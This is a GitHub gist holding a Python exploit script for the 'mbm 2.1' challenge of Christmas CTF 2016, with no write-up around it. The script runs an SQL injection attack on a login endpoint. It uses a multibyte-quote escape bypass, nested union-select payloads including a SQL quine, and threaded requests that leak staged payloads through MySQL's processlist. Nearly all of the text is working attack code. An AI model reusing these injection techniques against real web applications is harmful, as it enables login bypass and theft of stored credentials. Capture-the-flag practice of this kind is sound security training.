-
-
Save Jinmo/98a20f584bbcab8a727e10b1a86bd02e to your computer and use it in GitHub Desktop.
Christmas CTF 2016 mbm 2.1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # modified from https://blog.stypr.com/2015/07/17/justforfun-writeup/#more | |
| ''' | |
| how to use | |
| 1) python pwn.py 1 | |
| 2) python pwn.py 5 | |
| 3) look at the "pwn.py 1" instance | |
| ''' | |
| import urllib2 | |
| import urllib | |
| import sys | |
| import random | |
| import time | |
| import requests | |
| import threading | |
| import struct | |
| # exploit | |
| resource = lambda x: '(select uncompress(unhex(substring_index(substring_index(info, 0x' + (x + ':').encode('hex') + ', -1), 0x21, 1))) from information_schema.processlist where instr(info, 0x' + (x + ':').encode('hex') + '))' | |
| #pw, token | |
| x= ("' union select %s,%s#" % (resource('upw'), resource('rtoken'))) | |
| #id,pw,token | |
| a= "' union select %s,%s,0x%s#" % (resource('r2id'), resource('upw'), x.encode('hex')) | |
| #id,token | |
| b= ("' union select 0x" + a.encode('hex') + ", REPLACE(REPLACE(REPLACE('\\\' union select 0x" + a.encode('hex') + ", REPLACE(REPLACE(REPLACE(\"$\",CHAR(34),CHAR(39)),CHAR(36),\"$\"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#',CHAR(34),CHAR(39)),CHAR(36),'\\\' union select 0x" + a.encode('hex') + ", REPLACE(REPLACE(REPLACE(\"$\",CHAR(34),CHAR(39)),CHAR(36),\"$\"),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#'),CONCAT(CHAR(39),CHAR(39)),CONCAT(CHAR(39),CHAR(92),CHAR(39))) AS Quine#") | |
| print b | |
| #id,pw,token | |
| c= (" union select 0x61646d696e,%s,0x" % resource('upw') + b.encode('hex') + "#") | |
| d= '\x0A' + c | |
| payload = { | |
| 'uid': '\xBF\x27\x0A\x23', | |
| 'upw': d | |
| } | |
| #print d | |
| compress = lambda x: struct.pack("<L", len(x)) + x.encode('zlib') | |
| print compress('aa').encode('hex') | |
| register = lambda x, y: '#' + x + ':' + compress(y).encode('hex') + "!" | |
| ress = [register("r2id", a), register("rtoken", b), register("upw", d)] | |
| resource = "\n union select sleep(2),1,1#reshack" | |
| url = "http://devslave.com/c91103e3aabe04402fe6e31871bb3619/?page=login_chk" | |
| # url = "http://192.168.56.101/?page=login_chk" | |
| def resourcehacker(r): | |
| global url, resource | |
| payload = { | |
| 'uid': '\xBF\x27\x0A\x23', | |
| 'upw': resource + r | |
| } | |
| r = requests.post(url, data=payload) | |
| # print `r.text` | |
| for res in ress: | |
| reshack = threading.Thread(target=resourcehacker, args=(res, )) | |
| reshack.start() | |
| time.sleep(0.5) | |
| temp = "" | |
| #request_packet = urllib2.Request("http://ctf.leaveret.kr/go/37a6f7a829e19a70e85c8eca53489439/?page=login_chk", payload) | |
| r = requests.post(url, data=payload) | |
| request_data = r.text | |
| print(request_data) | |
| sys.exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment